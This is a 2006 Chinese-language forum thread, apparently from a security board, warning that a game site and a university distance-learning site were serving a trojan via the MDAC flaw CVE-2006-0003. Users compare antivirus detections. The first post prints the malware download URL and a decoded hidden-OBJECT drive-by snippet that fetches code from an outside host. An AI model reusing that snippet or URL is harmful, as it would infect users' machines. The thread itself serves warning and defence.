【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

第 1 頁,共 4 頁 1 2 3 ... 末頁末頁
顯示結果從第 1 筆 到 10 筆,共計 31 筆
  1. #1
    會員 hcchen 的大頭照
    註冊日期
    2002-07-26
    所在地區
    HTTB 10M/2M
    討論區文章
    137

    【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

    Microsoft Windows MDAC 漏洞 - CVE-2006-0003:

    作? ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
    RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
    洞的攻擊者可以完全控制受影響的系統。以下?使用此漏洞通過網頁散播木馬
    --------------------------------------------------------------------------
    2個網站的木馬來源均指向"中央大學遠距教學網"
    語法:
    Http://140.115.135.135/magic/_ken/4x6/COMET.Exe
    比較特別的是將文件解碼後發現以下的語法:
    語法:
    <BODY scroll=yes> 
    <OBJECT style="DISPLAY: none" type=text/x-scriptlet height=0 width=0 data=mk:@MSITStore:mhtml:c:\.mht!
    
    http://140.115.135.135/magic/_ken/4x6/hepl.txt::/%23%2E%68%74m></OBJECT></BODY>
    </html>
    木馬植入及相關行為:

    下載檔案及位置:

    COMET.Exe
    C:\Documents and Settings\user\Local Settings\Temporary Internet Files

    之後更名轉存:

    svchost.Exe
    C:\Documents and Settings\user\Local Settings\Temp

    自動執行後產生之檔案及位置:
    C:\MP.EXE
    C:\windows\loados.exe
    C:\windows\mcsdos32.dll

    造成 explorer.exe 程式錯誤。
    造成 drwtsn32.exe 大量偵測及程式錯誤。
    2者的錯誤造成幾乎當機的狀態。

    其他:未知。



  2. #2
    會員
    註冊日期
    2006-04-08
    所在地區
    ADSL 2M/256
    討論區文章
    36

    回覆: 【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

    最近怎麼木馬滿天飛?還有網頁綁架事件層出不窮?

    大部分的主流防毒都可測得,惟獨卡巴.....

    已傳給卡巴分析(卡巴好像碰到加殼的毒就沒法度)
    附加圖片 附加圖片 noname.jpg  

  3. #3
    地平線的那端 DarkSkyline 的大頭照
    註冊日期
    2001-05-09
    所在地區
    Hinet 4M/1M
    討論區文章
    554

    回覆: 【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

    http://140.115.135.135/magic/_ken/4x6/COMET.Exe檔案下載後,"AntiVir PersonalEdition Premium" 11/10日病毒碼找到"HEUR/Malware"惡意程式~

    77遊樂新世界 -> http://www.77.com.tw/ IE會自動下載 "****snow.exe"檔案,"AntiVir PersonalEdition Premium" 11/10日病毒碼找到"HEUR/Malware"惡意程式~

  4. #4
    會員
    註冊日期
    2006-07-05
    所在地區
    ADSL 2M/256
    討論區文章
    398

    回覆: 【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

    引用 作者:fq4lxx92
    最近怎麼木馬滿天飛?還有網頁綁架事件層出不窮?

    大部分的主流防毒都可測得,惟獨卡巴.....

    已傳給卡巴分析(卡巴好像碰到加殼的毒就沒法度)
    卡巴6.0的脫殼能力是出了名的強

  5. #5
    會員 hcchen 的大頭照
    註冊日期
    2002-07-26
    所在地區
    HTTB 10M/2M
    討論區文章
    137

    回覆: 【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

    中獎網站不段攀升,中獎的人數可想而知了。
    已經通知那2個網站的網管了。
    77遊樂新世界.....已經回函說處理好了。
    中央大學遠距教學網.......未知。

    本人用的是諾頓2004,目前持續更新中。
    諾頓的攔截方式應該是採用"病毒的行為模式"來攔截的。
    不過會直接停掉使用中的瀏覽器(開好幾個分頁...一次全部關掉......-..-")。



  6. #6
    會員
    註冊日期
    2006-05-24
    所在地區
    CABLE
    討論區文章
    533

    回覆: 【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

    11/13
    PC-cillin 2007病毒碼:3.919.50

    還掃不到

    NOD32是靠啟發式引擎掃到的

  7. #7
    會員
    註冊日期
    2005-07-03
    討論區文章
    53

    回覆: 【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

    BitDefender Antivirus v10
    掃到
    COMET.Exe Infected: Generic.Malware.dld!!.2E1E11A9

  8. #8
    會員 haol 的大頭照
    註冊日期
    2006-06-11
    所在地區
    ADSL 8M/512
    討論區文章
    97

    回覆: 【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

    引用 作者:hcchen
    中獎網站不段攀升,中獎的人數可想而知了。
    已經通知那2個網站的網管了。
    77遊樂新世界.....已經回函說處理好了。
    77遊樂新世界似乎又有新貨了top.exe
    (ps.還附上網址 )

  9. #9
    會員
    註冊日期
    2005-07-03
    討論區文章
    53

    回覆: 【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

    77遊樂新世界有新貨
    BitDefender Antivirus v10 掃到....
    top.exe
    infected with Trojan.Downloader.Small.BCK

  10. #10
    會員
    註冊日期
    2006-05-24
    所在地區
    CABLE
    討論區文章
    533

    回覆: 【木馬】77遊樂新世界 及 中央大學遠距教學網被植木馬

    2006-11-16, 晚上9:34分還有病毒嗎?

    我開NOD32進去沒掃到



第 1 頁,共 4 頁 1 2 3 ... 末頁末頁

類似的主題

  1. 【木馬】77遊樂新世界(第3隻)
    作者:haol 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 5
    最後發表: 2006-11-21, 09:20 PM
  2. 各位有哪位在中央大學後門那邊有申請ADSL的
    作者:microsome 所在討論版:---- ADSL 方 案 與 費 率
    回覆: 2
    最後發表: 2005-07-31, 12:04 AM
  3. 【新聞】中央大學生入侵美國國防部?
    作者:天氣預報 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 1
    最後發表: 2004-03-06, 03:28 PM
  4. 南京中央大學哲學系的迂迴情事!!!(轉貼)
    作者:rsietn 所在討論版:-- 網 路 [ 佳 作 / 奇 文 ] 欣 賞 版
    回覆: 0
    最後發表: 2001-12-02, 04:39 PM
  5. 中央大學水族生態社
    作者:hy219 所在討論版:-- 優 質 網 站 分 享
    回覆: 0
    最後發表: 2001-11-21, 01:56 PM

 

此網頁沒有從搜尋引擎而來的訪客

發表文章規則

  • 不可以發表新主題
  • 不可以回覆文章
  • 不可以上傳附加檔案
  • 不可以編輯自己的文章
  •